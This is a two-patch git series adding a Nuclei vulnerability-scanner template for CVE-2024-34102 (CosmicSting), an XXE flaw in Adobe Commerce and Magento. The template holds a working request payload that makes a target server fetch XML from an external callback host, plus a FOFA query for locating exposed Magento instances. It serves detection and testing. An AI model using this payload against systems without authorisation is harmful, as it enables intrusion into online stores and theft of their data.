From 7d50cd4f0a40d883bc06a94f20d9b6d3dd930d1a Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 25 Jun 2024 22:45:09 +0530
Subject: [PATCH 1/2] Create CVE-2024-34102.yaml (Adobe Commerce & Magento -
 CosmicSting)

---
 http/cves/2024/CVE-2024-34102.yaml | 41 ++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-34102.yaml

diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml
new file mode 100644
index 0000000000..42c338e4a0
--- /dev/null
+++ b/http/cves/2024/CVE-2024-34102.yaml
@@ -0,0 +1,41 @@
+id: CVE-2024-34102
+
+info:
+  name: Adobe Commerce & Magento - CosmicSting
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution.
+  reference:
+    - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
+  metadata:
+    fofa-query: app="Adobe-Magento"
+    verified: true
+    max-request: 1
+  tags: cve,cve2024,adobe,magento,xxe
+
+http:
+  - raw:
+      - |
+        POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - "message"
+
+      - type: word
+        part: header
+        words:
+          - "application/json"

From 5a4588464fe924291e8053b5fc94a461ed0c2f7e Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Wed, 26 Jun 2024 14:27:08 +0530
Subject: [PATCH 2/2] minor update

---
 http/cves/2024/CVE-2024-34102.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/cves/2024/CVE-2024-34102.yaml b/http/cves/2024/CVE-2024-34102.yaml
index 42c338e4a0..debe60ad35 100644
--- a/http/cves/2024/CVE-2024-34102.yaml
+++ b/http/cves/2024/CVE-2024-34102.yaml
@@ -28,12 +28,12 @@ http:
       - type: word
         part: interactsh_protocol # Confirms the DNS Interaction
         words:
-          - "dns"
+          - 'dns'
 
       - type: word
         part: body
         words:
-          - "message"
+          - '"message":'
 
       - type: word
         part: header